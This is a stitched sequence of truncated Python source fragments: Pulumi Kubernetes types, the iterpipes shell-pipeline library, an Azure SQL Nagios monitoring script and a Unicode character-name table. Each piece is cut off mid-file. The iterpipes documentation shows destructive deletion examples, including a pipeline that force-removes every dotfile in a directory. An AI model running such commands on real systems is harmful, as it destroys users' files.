return pulumi.get(self, "gmsa_credential_spec")
@property
@pulumi.getter(name="gmsaCredentialSpecName")
def gmsa_credential_spec_name(self) -> Optional[str]:
"""
GMSACredentialSpecName is the name of the GMSA credential spec to use.
"""
return pulumi.get(self, "gmsa_credential_spec_name")
@property
@pulumi.getter(name="runAsUserName")
def run_as_user_name(self) -> Optional[str]:
"""
The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_user_name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersStartupProbe(dict):
"""
StartupProbe indicates that the Pod | |
<reponame>kelleyk/py3k-iterpipes
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2010 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''A library for running shell pipelines using shell-like syntax.
Rationale
---------
Python is a good choice for many software tools, but it lacks clarity and
simplicity of command shells when it comes to running command pipelines from
scripts. The standard [subprocess][] module provides basic inter-processing
tools, but it requires lots of lines to express a single shell line.
`iterpipes` is trying to overcome this limitation by representing a shell
command pipeline as *a function over iterables*, similar to functions from the
standard [itertools][] module.
Description
-----------
`iterpipes` is a thin wrapper around the standard [subprocess][] module. It
represents a shell command pipeline as a function over iterables that maps its
`stdin` to `stdout`. As `iterpipes` deals with iterables, it plays nicely with
[itertools][] from the standard library, as well as with list comprehensions and
generator expressions.
To invoke a shell command pipeline, you should:
1. Create it using a command constructor
2. Execute it directly or via a helper function
### Command Constructors
Commands are created using command constructors. Command constructors take a
string `command` to run as their first argument. Special values `'{}'` in the
`command` are replaced with constructors' positional arguments using *safe shell
escaping*.
Keyword arguments of constructors are almost identical to the keyword arguments
of `subprocess.Popen` from [subprocess][]. This allows redirecting `stdout` to a
file, merging `stdout` and `stderr`, etc.
Here are several examples for using command constructors:
cmd('rm -fr {}', dirname)
linecmd('find {} -name {} -print0 | xargs -0 wc -l'
dirname,
'\*.py')
cmd(r'ls -d .* | tr \n \0 | xargs -0 rm -f')
Command constructors summary:
* `bincmd`:
a binary command, that works with `str` iterables
* `cmd`:
a string command, that works with `unicode` iterables and performs necessary
encoding conversions
* `linecmd`:
a line-oriented command, that returns buffered `unicode` lines delimited by
the newline character `'\n'`
### Execution Helpers
As a command is an ordinary function over iterables, you can run it by passing
an `stdin` iterable as its `input` and iterating over its `stdout` result:
for line in linecmd('gunzip | head')(zipped_data):
print line.rstrip('\\n')
If a command returns a non-zero code, then the `CalledProcessError` exception is
raised.
It is often the case that a command doesn't require any `stdin` data or doesn't
write anything useful to `stdout`. There are several helper functions for such
cases.
If a command doesn't need any `stdin` data, you may run it using `None` or `[]`
as its `input` or use the `run` helper function to get a little bit more
readable syntax:
for line in run(linecmd('ls -a')):
print line.rstrip('\\n')
If a command delivers no useful data to `stdout`, then you may use `call` or
`check_call` helpers. If you need a return code of the command, use the `call`
helper:
retcode = call(cmd('rm -f {}', filename))
otherwise use the `check_call` helper that raises `CalledProcessError` on errors:
check_call(cmd('rm -f {}', filename))
Execution helpers summary:
* `run`:
run a command with `None` as the default `input` value
* `call`:
run a command and return its return code
* `check_call`:
run a command and raise an exception if it returned a non-zero code
All the execution helpers accept `input` as their second argument. The default
value for `input` is `None`.
### Other Functions
* `format`:
format a shell command using safe escapes and argument substitutions
* `compose`:
function composition from the functional programming world
Examples
--------
It is useful to abstract the execution of a command using a Python function. For
example, you may find yourself writing several lines of code for creating
tarball archives of directories. You can hide details of creating tarballs by
defining the following function:
def make_zipped_tarball(dirname, output_path='.'):
name = os.path.basename(os.path.normpath(dirname))
tar = cmd('tar -czf {} {}',
os.path.join(output_path, '%s.tar.gz' % name),
dirname)
check_call(tar)
[subprocess]: http://docs.python.org/library/subprocess.html
[itertools]: http://docs.python.org/library/itertools.html
'''
from __future__ import with_statement
from contextlib import contextmanager
import re, errno, locale
from subprocess import Popen, PIPE, CalledProcessError
from threading import Thread
from codecs import iterdecode
from functools import reduce
import six
__all__ = [
'cmd', 'bincmd', 'linecmd', 'run', 'call', 'check_call', 'format',
'compose',
]
DEFAULT_READ_BUFSIZE = 4096
def bincmd(command, *args, **kwargs):
'''Create a binary command.
Arguments:
* `command`:
a shell pipeline string. Special `'{}'` values in `command` are replaced
with positional arguments using safe shell escaping
The keyword arguments are identical to the keyword arguments of
`subprocess.Popen`.
Return value:
A binary command that works with `str` iterables. It is a function from
`stdin` iterable to `stdout` iterable. It also may accept a single `str`
value or `None`.
'''
kwargs = kwargs.copy()
kwargs.setdefault('stdout', PIPE)
command = format(command, args)
return lambda input: _run_pipeline(command, input, **kwargs)
def cmd(command, *args, **kwargs):
'''Create a string command.
It is an extension of `bincmd` that performs necessary encoding conversions
for `unicode` values.
Arguments:
* `command`:
a shell pipeline string. Special `'{}'` values in `command` are replaced
with positional arguments using safe shell escaping
Keyword arguments:
* `encoding`:
a string encoding for `unicode` values. If not specified, the
locale-specific encoding will be used
The other keyword arguments are identical to the keyword arguments of
`subprocess.Popen`.
Return value:
A string command that works with `unicode` iterables and performs necessary
encoding conversions. It is a function from `stdin` iterable to `stdout`
iterable. It also may accept a single `unicode` value or `None`.
'''
def decode(xs):
return iterdecode(xs, encoding)
def encode(xs):
if isinstance(input, six.text_type):
return [xs.encode(encoding)]
elif xs is None:
return xs
else:
return (x.encode(encoding) for x in xs)
kwargs = kwargs.copy()
encoding = kwargs.setdefault('encoding', locale.getpreferredencoding())
kwargs.pop('encoding')
return compose(decode, bincmd(command, *args, **kwargs), encode)
def linecmd(command, *args, **kwargs):
r'''Create a line-oriented command.
It is an extension of `cmd` that returns buffered `unicode` lines.
Arguments:
* `command`:
a shell pipeline string. Special `'{}'` values in `command` are replaced
with positional arguments using safe shell escaping
Keyword arguments:
* `encoding`:
a string encoding for `unicode` values. If not specified, the
locale-specific encoding will be used
The other keyword arguments are identical to the keyword arguments of
`subprocess.Popen`.
Return value:
A line-oriented command that returns buffered `unicode` lines delimited by
the newline character `'\n'`. It works with `unicode` iterables and performs
necessary encoding conversions. It is a function from `stdin` iterable to
`stdout` iterable. It also may accept a single `unicode` value or `None`.
'''
kwargs = kwargs.copy()
kwargs['bufsize'] = 1
return cmd(command, *args, **kwargs)
def run(cmd, input=None):
'''Run a command with `None` as the default `input` value.
If the process running `cmd` returns a non-zero code, then a
`CalledProcessError` is raised.
Arguments:
* `cmd`:
a command to run. It is a function over iterables.
* `input`:
the `stdin` data. It may be an iterable, a single value or `None`.
The return value is the `cmd`'s resulting `stdout` iterable.
'''
return cmd(input)
def call(cmd, input=None):
'''Run a command and return its return code.
Arguments:
* `cmd`:
a command to run. It is a function over iterables.
* `input`:
the `stdin` data. It may be an iterable, a single value or `None`.
The return value is the return code of the process running `cmd`.
'''
return _retcode(run(cmd, input))
def check_call(cmd, input=None):
'''Run a command and raise an exception if it returned a non-zero code.
If the process running `cmd` returns a non-zero code, then a
`CalledProcessError` is raised.
Arguments:
* `cmd`:
a command to | |
#!/usr/bin/python
# Copyright 2013 MS Open Tech
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#check_azure_compute.py: Azure compute monitor script
import argparse
import exceptions
import logging
import os
import pyodbc
import sys
from datetime import datetime
from datetime import timedelta
logger = None
DBSIZE_DMV = '''SELECT SUM(reserved_page_count)*8.0/1024 FROM
sys.dm_db_partition_stats;'''
OBJSIZE_DMV = '''SELECT sys.objects.name, SUM(reserved_page_count)
* 8.0 / 1024 FROM sys.dm_db_partition_stats, sys.objects
WHERE sys.dm_db_partition_stats.object_id =
sys.objects.object_id GROUP BY sys.objects.name; '''
DBCONNECTIONS_DMV = '''SELECT e.connection_id, s.session_id, s.login_name,
s.last_request_end_time, s.cpu_time FROM
sys.dm_exec_sessions s INNER JOIN sys.dm_exec_connections e
ON s.session_id = e.session_id;'''
TOP5QUERIES_DMV = '''SELECT TOP 5 query_stats.query_hash AS "Query Hash",
SUM(query_stats.total_worker_time) /
SUM(query_stats.execution_count) AS "Avg CPU Time",
MIN(query_stats.statement_text) AS "Statement Text"
FROM
(SELECT QS.*,
SUBSTRING(ST.text, (QS.statement_start_offset/2) + 1,
((CASE statement_end_offset
WHEN -1 THEN DATALENGTH(st.text)
ELSE QS.statement_end_offset END
- QS.statement_start_offset)/2) + 1) AS statement_text
FROM sys.dm_exec_query_stats AS QS
CROSS APPLY sys.dm_exec_sql_text(QS.sql_handle) as ST)
as query_stats
GROUP BY query_stats.query_hash
ORDER BY 2 DESC;'''
QUERYPLAN_DMV = '''SELECT
highest_cpu_queries.plan_handle,
highest_cpu_queries.total_worker_time,
q.dbid,
q.objectid,
q.number,
q.encrypted,
q.[text]
FROM
(SELECT TOP 50
qs.plan_handle,
qs.total_worker_time
FROM
sys.dm_exec_query_stats qs
ORDER BY qs.total_worker_time desc) AS
highest_cpu_queries
CROSS APPLY sys.dm_exec_sql_text(plan_handle) AS q
ORDER BY highest_cpu_queries.total_worker_time desc'''
BWUSAGE_VIEW = 'select * from sys.bandwidth_usage where time > %s'
DBUSAGE_VIEW = 'select * from sys.database_usage where time > %s'
RESSTAT_VIEW = 'select * from sys.resource_stats where start_time > %s'
RESUSAGE_VIEW = 'select * from sys.resource_usage where time > %s'
OPSTATUS_VIEW = '''select resource_type_desc, operation, error_code,
error_desc, error_severity from sys.dm_operation_status'''
DBCONNECTION_VIEW = '''select * from sys.database_connection_stats
where start_time > %s'''
EVENTLOG_VIEW = 'select * from sys.event_log where start_time > %s'
def is_within_range(nagstring, value):
"""check if the value is withing the nagios range string
nagstring -- nagios range string
value -- value to compare
Returns true if within the range, else false
"""
if not nagstring:
return False
import re
#import operator
first_float = r'(?P<first>(-?[0-9]+(\.[0-9]+)?))'
second_float = r'(?P<second>(-?[0-9]+(\.[0-9]+)?))'
actions = [ (r'^%s$' % first_float,
lambda y: (value > float(y.group('first'))) or (value < 0)),
(r'^%s:$' % first_float,
lambda y: value < float(y.group('first'))),
(r'^~:%s$' % first_float,
lambda y: value > float(y.group('first'))),
(r'^%s:%s$' % (first_float,second_float),
lambda y: (value < float(y.group('first'))) or
(value > float(y.group('second')))),
(r'^@%s:%s$' % (first_float,second_float),
lambda y: not((value < float(y.group('first'))) or
(value > float(y.group('second')))))]
for regstr, func in actions:
res = re.match(regstr, nagstring)
if res:
return func(res)
raise Exception('Improper warning/critical parameter format.')
def nagios_eval(result, warning, critical, nagios_message, unit='',
verbosity = 0):
"""check result with respect to warning and critical range
result -- counter value
warning -- nagios warning range string
critical -- nagios critical range string
nagios_message -- Nagios message
unit -- unit for the perf counter value
verbosity -- nagios verbosity value
Returns nagios code, and error message
"""
if is_within_range(critical, result):
prefix = 'CRITICAL:'
code = 2
elif is_within_range(warning, result):
prefix = 'WARNING:'
code = 1
else:
prefix = 'OK:'
code = 0
strresult = str(result)
if verbosity == 0:
if code > 0:
nagios_message = '%s' % prefix
else:
nagios_message = ''
elif verbosity == 1:
if code > 0:
nagios_message = nagios_message % (strresult)
nagios_message = '%s:%s %s' % ( prefix, nagios_message, unit or '')
else:
nagios_message = ''
else:
nagios_message = nagios_message % (strresult)
nagios_message = '%s%s%s,warning=%s,critical=%s,' % \
( prefix, nagios_message, unit or '', warning or '', critical or '')
return code, nagios_message
def analyze_dbsize(dbname, counter, row, warning, critical, verbosity):
"""analyze database size by comparing it with warning and critical ranges
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
nagios_message = 'Size:%s'
result = row[0]
error_code, message = nagios_eval(result, warning, critical, nagios_message, \
'MB', verbosity)
return error_code, message
def analyze_objsize(dbname, counter, row, warning, critical, verbosity):
"""analyze object sizes by comparing them with warning and critical ranges
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
nagios_message = 'Object:%s, Size:%%s' % (row[0],)
result = row[1]
error_code, message = nagios_eval(result, warning, critical, nagios_message,
'MB', verbosity)
return error_code, message
def analyze_conn_info(dbname, counter, row, warning, critical, verbosity):
"""analyze connnection response time using warning and critical args
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
nagios_message = 'Database:%s, Login name:%s, CPU time:%%s' % \
(dbname, row[2],)
result = row[4]
error_code, message = nagios_eval(result, warning, critical,
nagios_message, 'ms', verbosity)
return error_code, message
def analyze_top5_queries(dbname, counter, row, warning, critical, verbosity):
"""Check top 5 database queries with warning and critical ranges
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
nagios_message = 'Database:%s, query:%s, CPU time:%%s' % (dbname, row[2],)
result = row[1]
error_code, message = nagios_eval(result, warning, critical,
nagios_message, 'ms', verbosity)
return error_code, message
def byte_to_hex( bytestr ):
""" Convert a byte string to it's hex representation. """
return ''.join( [ '%02X ' % ord( x ) for x in bytestr ] ).strip()
def analyze_queryplan(dbname, counter, row, warning, critical, verbosity):
"""check query plan by comparing total woker time wrt warning and critical
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
#handle = byte_to_hex(str(row[0]))
strquery = str(row[6])
nagios_message = 'Database:%s, query:%s, Total worker time:%%s' % \
(dbname, strquery, )
result = row[1]
error_code, message = nagios_eval(result, warning, critical,
nagios_message, 'ms', verbosity)
return error_code, message
def analyze_bwusage(dbname, counter, row, warning, critical, verbosity):
"""Analyze bandwidth usage with warning and critical ranges
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument to the command.
"""
nagios_message = 'Database:%s, Time:%s, direction:%s, class:%s, '\
'time-period:%s, Size : %%s' % \
(row[1], str(row[0]), row[2], row[3], row[4],)
result = row[5]
error_code, message = nagios_eval(result, warning, critical,
nagios_message, 'MB', verbosity)
return error_code, message
def analyze_dbusage(dbname, counter, row, warning, critical, verbosity):
"""check query plan CPU usage with warning and critical ranges.
Does not use db size
dbname - name of database
counter - entry in the COUNTERS list
row - perf data from SQL server as an output of the SQL query/DMV
warning - warning range argument to the command
critical - critical range argument to the command
verbosity - verbose argument | |
SYLLABLE MGBI': None,
'VAI SYLLABLE MGBO': None,
'VAI SYLLABLE MGBOO': None,
'VAI SYLLABLE MGBU': None,
'VAI SYLLABLE MI': None,
'VAI SYLLABLE MO': None,
'VAI SYLLABLE MOO': None,
'VAI SYLLABLE MU': None,
'VAI SYLLABLE NA': None,
'VAI SYLLABLE NDA': None,
'VAI SYLLABLE NDE': None,
'VAI SYLLABLE NDEE': None,
'VAI SYLLABLE NDI': None,
'VAI SYLLABLE NDO': None,
'VAI SYLLABLE NDOLE DO': None,
'VAI SYLLABLE NDOLE FA': None,
'VAI SYLLABLE NDOLE KA': None,
'VAI SYLLABLE NDOLE MA': None,
'VAI SYLLABLE NDOLE SOO': None,
'VAI SYLLABLE NDOO': None,
'VAI SYLLABLE NDU': None,
'VAI SYLLABLE NE': None,
'VAI SYLLABLE NEE': None,
'VAI SYLLABLE NG': None,
'VAI SYLLABLE NGAN': None,
'VAI SYLLABLE NGEN': None,
'VAI SYLLABLE NGGA': None,
'VAI SYLLABLE NGGE': None,
'VAI SYLLABLE NGGEE': None,
'VAI SYLLABLE NGGEN': None,
'VAI SYLLABLE NGGI': None,
'VAI SYLLABLE NGGO': None,
'VAI SYLLABLE NGGOO': None,
'VAI SYLLABLE NGGU': None,
'VAI SYLLABLE NGON': None,
'VAI SYLLABLE NI': None,
'VAI SYLLABLE NJA': None,
'VAI SYLLABLE NJE': None,
'VAI SYLLABLE NJEE': None,
'VAI SYLLABLE NJI': None,
'VAI SYLLABLE NJO': None,
'VAI SYLLABLE NJOO': None,
'VAI SYLLABLE NJU': None,
'VAI SYLLABLE NO': None,
'VAI SYLLABLE NOO': None,
'VAI SYLLABLE NU': None,
'VAI SYLLABLE NYA': None,
'VAI SYLLABLE NYE': None,
'VAI SYLLABLE NYEE': None,
'VAI SYLLABLE NYI': None,
'VAI SYLLABLE NYO': None,
'VAI SYLLABLE NYOO': None,
'VAI SYLLABLE NYU': None,
'VAI SYLLABLE O': None,
'VAI SYLLABLE ON': None,
'VAI SYLLABLE OO': None,
'VAI SYLLABLE OON': None,
'VAI SYLLABLE PA': None,
'VAI SYLLABLE PE': None,
'VAI SYLLABLE PEE': None,
'VAI SYLLABLE PI': None,
'VAI SYLLABLE PO': None,
'VAI SYLLABLE POO': None,
'VAI SYLLABLE PU': None,
'VAI SYLLABLE RA': None,
'VAI SYLLABLE RE': None,
'VAI SYLLABLE REE': None,
'VAI SYLLABLE RI': None,
'VAI SYLLABLE RO': None,
'VAI SYLLABLE ROO': None,
'VAI SYLLABLE RU': None,
'VAI SYLLABLE SA': None,
'VAI SYLLABLE SE': None,
'VAI SYLLABLE SEE': None,
'VAI SYLLABLE SHA': None,
'VAI SYLLABLE SHE': None,
'VAI SYLLABLE SHEE': None,
'VAI SYLLABLE SHI': None,
'VAI SYLLABLE SHO': None,
'VAI SYLLABLE SHOO': None,
'VAI SYLLABLE SHU': None,
'VAI SYLLABLE SI': None,
'VAI SYLLABLE SO': None,
'VAI SYLLABLE SOO': None,
'VAI SYLLABLE SU': None,
'VAI SYLLABLE TA': None,
'VAI SYLLABLE TE': None,
'VAI SYLLABLE TEE': None,
'VAI SYLLABLE THA': None,
'VAI SYLLABLE THE': None,
'VAI SYLLABLE THEE': None,
'VAI SYLLABLE THI': None,
'VAI SYLLABLE THO': None,
'VAI SYLLABLE THOO': None,
'VAI SYLLABLE THU': None,
'VAI SYLLABLE TI': None,
'VAI SYLLABLE TO': None,
'VAI SYLLABLE TOO': None,
'VAI SYLLABLE TU': None,
'VAI SYLLABLE U': None,
'VAI SYLLABLE UN': None,
'VAI SYLLABLE VA': None,
'VAI SYLLABLE VE': None,
'VAI SYLLABLE VEE': None,
'VAI SYLLABLE VI': None,
'VAI SYLLABLE VO': None,
'VAI SYLLABLE VOO': None,
'VAI SYLLABLE VU': None,
'VAI SYLLABLE WA': None,
'VAI SYLLABLE WAN': None,
'VAI SYLLABLE WE': None,
'VAI SYLLABLE WEE': None,
'VAI SYLLABLE WEEN': None,
'VAI SYLLABLE WEN': None,
'VAI SYLLABLE WI': None,
'VAI SYLLABLE WIN': None,
'VAI SYLLABLE WO': None,
'VAI SYLLABLE WON': None,
'VAI SYLLABLE WOO': None,
'VAI SYLLABLE WOON': None,
'VAI SYLLABLE WU': None,
'VAI SYLLABLE WUN': None,
'VAI SYLLABLE YA': None,
'VAI SYLLABLE YE': None,
'VAI SYLLABLE YEE': None,
'VAI SYLLABLE YI': None,
'VAI SYLLABLE YO': None,
'VAI SYLLABLE YOO': None,
'VAI SYLLABLE YU': None,
'VAI SYLLABLE ZA': None,
'VAI SYLLABLE ZE': None,
'VAI SYLLABLE ZEE': None,
'VAI SYLLABLE ZHA': None,
'VAI SYLLABLE ZHE': None,
'VAI SYLLABLE ZHEE': None,
'VAI SYLLABLE ZHI': None,
'VAI SYLLABLE ZHO': None,
'VAI SYLLABLE ZHOO': None,
'VAI SYLLABLE ZHU': None,
'VAI SYLLABLE ZI': None,
'VAI SYLLABLE ZO': None,
'VAI SYLLABLE ZOO': None,
'VAI SYLLABLE ZU': None,
'VAI SYMBOL BANG': None,
'VAI SYMBOL DANG': None,
'VAI SYMBOL DO-O': None,
'VAI SYMBOL DOONG': None,
'VAI SYMBOL FAA': None,
'VAI SYMBOL FEENG': None,
'VAI SYMBOL JONG': None,
'VAI SYMBOL KEENG': None,
'VAI SYMBOL KUNG': None,
'VAI SYMBOL NII': None,
'VAI SYMBOL TAA': None,
'VAI SYMBOL TING': None,
'VAI SYMBOL TONG': None,
'VARIATION SELECTOR-100': None,
'VARIATION SELECTOR-101': None,
'VARIATION SELECTOR-102': None,
'VARIATION SELECTOR-103': None,
'VARIATION SELECTOR-104': None,
'VARIATION SELECTOR-105': None,
'VARIATION SELECTOR-106': None,
'VARIATION SELECTOR-107': None,
'VARIATION SELECTOR-108': None,
'VARIATION SELECTOR-109': None,
'VARIATION SELECTOR-110': None,
'VARIATION SELECTOR-111': None,
'VARIATION SELECTOR-112': None,
'VARIATION SELECTOR-113': None,
'VARIATION SELECTOR-114': None,
'VARIATION SELECTOR-115': None,
'VARIATION SELECTOR-116': None,
'VARIATION SELECTOR-117': None,
'VARIATION SELECTOR-118': None,
'VARIATION SELECTOR-119': None,
'VARIATION SELECTOR-120': None,
'VARIATION SELECTOR-121': None,
'VARIATION SELECTOR-122': None,
'VARIATION SELECTOR-123': None,
'VARIATION SELECTOR-124': None,
'VARIATION SELECTOR-125': None,
'VARIATION SELECTOR-126': None,
'VARIATION SELECTOR-127': None,
'VARIATION SELECTOR-128': None,
'VARIATION SELECTOR-129': None,
'VARIATION SELECTOR-130': None,
'VARIATION SELECTOR-131': None,
'VARIATION SELECTOR-132': None,
'VARIATION SELECTOR-133': None,
'VARIATION SELECTOR-134': None,
'VARIATION SELECTOR-135': None,
'VARIATION SELECTOR-136': None,
'VARIATION SELECTOR-137': None,
'VARIATION SELECTOR-138': None,
'VARIATION SELECTOR-139': None,
'VARIATION SELECTOR-140': None,
'VARIATION SELECTOR-141': None,
'VARIATION SELECTOR-142': None,
'VARIATION SELECTOR-143': None,
'VARIATION SELECTOR-144': None,
'VARIATION SELECTOR-145': None,
'VARIATION SELECTOR-146': None,
'VARIATION SELECTOR-147': None,
'VARIATION SELECTOR-148': None,
'VARIATION SELECTOR-149': None,
'VARIATION SELECTOR-150': None,
'VARIATION SELECTOR-151': None,
'VARIATION SELECTOR-152': None,
'VARIATION SELECTOR-153': None,
'VARIATION SELECTOR-154': None,
'VARIATION SELECTOR-155': None,
'VARIATION SELECTOR-156': None,
'VARIATION SELECTOR-157': None,
'VARIATION SELECTOR-158': None,
'VARIATION SELECTOR-159': None,
'VARIATION SELECTOR-160': None,
'VARIATION SELECTOR-161': None,
'VARIATION SELECTOR-162': None,
'VARIATION SELECTOR-163': None,
'VARIATION SELECTOR-164': None,
'VARIATION SELECTOR-165': None,
'VARIATION SELECTOR-166': None,
'VARIATION SELECTOR-167': None,
'VARIATION SELECTOR-168': None,
'VARIATION SELECTOR-169': None,
'VARIATION SELECTOR-17': None,
'VARIATION SELECTOR-170': None,
'VARIATION SELECTOR-171': None,
'VARIATION SELECTOR-172': None,
'VARIATION SELECTOR-173': None,
'VARIATION SELECTOR-174': None,
'VARIATION SELECTOR-175': None,
'VARIATION SELECTOR-176': None,
'VARIATION SELECTOR-177': None,
'VARIATION SELECTOR-178': None,
'VARIATION SELECTOR-179': None,
'VARIATION SELECTOR-18': None,
'VARIATION SELECTOR-180': None,
'VARIATION SELECTOR-181': None,
'VARIATION SELECTOR-182': None,
'VARIATION SELECTOR-183': None,
'VARIATION SELECTOR-184': None,
'VARIATION SELECTOR-185': None,
'VARIATION SELECTOR-186': None,
'VARIATION SELECTOR-187': None,
'VARIATION SELECTOR-188': None,
'VARIATION SELECTOR-189': None,
'VARIATION SELECTOR-19': None,
'VARIATION SELECTOR-190': None,
'VARIATION SELECTOR-191': None,
'VARIATION SELECTOR-192': None,
'VARIATION SELECTOR-193': None,
'VARIATION SELECTOR-194': None,
'VARIATION SELECTOR-195': None,
'VARIATION SELECTOR-196': None,
'VARIATION SELECTOR-197': None,
'VARIATION SELECTOR-198': None,
'VARIATION SELECTOR-199': None,
'VARIATION SELECTOR-20': None,
'VARIATION SELECTOR-200': None,
'VARIATION SELECTOR-201': None,
'VARIATION SELECTOR-202': None,
'VARIATION SELECTOR-203': None,
'VARIATION SELECTOR-204': None,
'VARIATION SELECTOR-205': None,
'VARIATION SELECTOR-206': None,
'VARIATION SELECTOR-207': None,
'VARIATION SELECTOR-208': None,
'VARIATION SELECTOR-209': None,
'VARIATION SELECTOR-21': None,
'VARIATION SELECTOR-210': None,
'VARIATION SELECTOR-211': None,
'VARIATION SELECTOR-212': None,
'VARIATION SELECTOR-213': None,
'VARIATION SELECTOR-214': None,
'VARIATION SELECTOR-215': None,
'VARIATION SELECTOR-216': None,
'VARIATION SELECTOR-217': None,
'VARIATION SELECTOR-218': None,
'VARIATION SELECTOR-219': None,
'VARIATION SELECTOR-22': None,
'VARIATION SELECTOR-220': None,
'VARIATION SELECTOR-221': None,
'VARIATION SELECTOR-222': None,
'VARIATION SELECTOR-223': None,
'VARIATION SELECTOR-224': None,
'VARIATION SELECTOR-225': None,
'VARIATION SELECTOR-226': None,
'VARIATION SELECTOR-227': None,
'VARIATION SELECTOR-228': None,
'VARIATION SELECTOR-229': None,
'VARIATION SELECTOR-23': None,
'VARIATION SELECTOR-230': None,
'VARIATION SELECTOR-231': None,
'VARIATION SELECTOR-232': None,
'VARIATION SELECTOR-233': None,
'VARIATION SELECTOR-234': None,
'VARIATION SELECTOR-235': None,
'VARIATION SELECTOR-236': None,
'VARIATION SELECTOR-237': None,
'VARIATION SELECTOR-238': None,
'VARIATION SELECTOR-239': None,
'VARIATION SELECTOR-24': None,
'VARIATION SELECTOR-240': None,
'VARIATION SELECTOR-241': None,
'VARIATION SELECTOR-242': None,
'VARIATION SELECTOR-243': None,
'VARIATION SELECTOR-244': None,
'VARIATION SELECTOR-245': None,
'VARIATION SELECTOR-246': None,
'VARIATION SELECTOR-247': None,
'VARIATION SELECTOR-248': None,
'VARIATION SELECTOR-249': None,
'VARIATION SELECTOR-25': None,
'VARIATION SELECTOR-250': None,
'VARIATION SELECTOR-251': None,
'VARIATION SELECTOR-252': None,
'VARIATION SELECTOR-253': None,
'VARIATION SELECTOR-254': None,
'VARIATION SELECTOR-255': None,
'VARIATION SELECTOR-256': None,
'VARIATION SELECTOR-26': None,
'VARIATION SELECTOR-27': None,
'VARIATION SELECTOR-28': None,
'VARIATION SELECTOR-29': None,
'VARIATION SELECTOR-30': None,
'VARIATION SELECTOR-31': None,
'VARIATION SELECTOR-32': None,
'VARIATION SELECTOR-33': None,
'VARIATION SELECTOR-34': None,
'VARIATION SELECTOR-35': None,
'VARIATION SELECTOR-36': None,
'VARIATION SELECTOR-37': None,
'VARIATION SELECTOR-38': None,
'VARIATION SELECTOR-39': None,
'VARIATION SELECTOR-40': None,
'VARIATION SELECTOR-41': None,
'VARIATION SELECTOR-42': None,
'VARIATION SELECTOR-43': None,
'VARIATION SELECTOR-44': None,
'VARIATION SELECTOR-45': None,
'VARIATION SELECTOR-46': None,
'VARIATION SELECTOR-47': None,
'VARIATION SELECTOR-48': None,
'VARIATION SELECTOR-49': None,
'VARIATION SELECTOR-50': None,
'VARIATION SELECTOR-51': None,
'VARIATION SELECTOR-52': None,
'VARIATION SELECTOR-53': None,
'VARIATION SELECTOR-54': None,
'VARIATION SELECTOR-55': None,
'VARIATION SELECTOR-56': None,
'VARIATION SELECTOR-57': None,
'VARIATION SELECTOR-58': None,
'VARIATION SELECTOR-59': None,
'VARIATION SELECTOR-60': None,
'VARIATION SELECTOR-61': None,
'VARIATION SELECTOR-62': None,
'VARIATION SELECTOR-63': None,
'VARIATION SELECTOR-64': None,
'VARIATION SELECTOR-65': None,
'VARIATION SELECTOR-66': None,
'VARIATION SELECTOR-67': None,
'VARIATION SELECTOR-68': None,
'VARIATION SELECTOR-69': None,
'VARIATION SELECTOR-70': None,
'VARIATION SELECTOR-71': None,
'VARIATION SELECTOR-72': None,
'VARIATION SELECTOR-73': None,
'VARIATION SELECTOR-74': None,
'VARIATION SELECTOR-75': None,
'VARIATION SELECTOR-76': None,
'VARIATION SELECTOR-77': None,
'VARIATION SELECTOR-78': None,
'VARIATION SELECTOR-79': None,
'VARIATION SELECTOR-80': None,
'VARIATION SELECTOR-81': None,
'VARIATION SELECTOR-82': None,
'VARIATION SELECTOR-83': None,
'VARIATION SELECTOR-84': None,
'VARIATION SELECTOR-85': None,
'VARIATION SELECTOR-86': None,
'VARIATION SELECTOR-87': None,
'VARIATION SELECTOR-88': None,
'VARIATION SELECTOR-89': None,
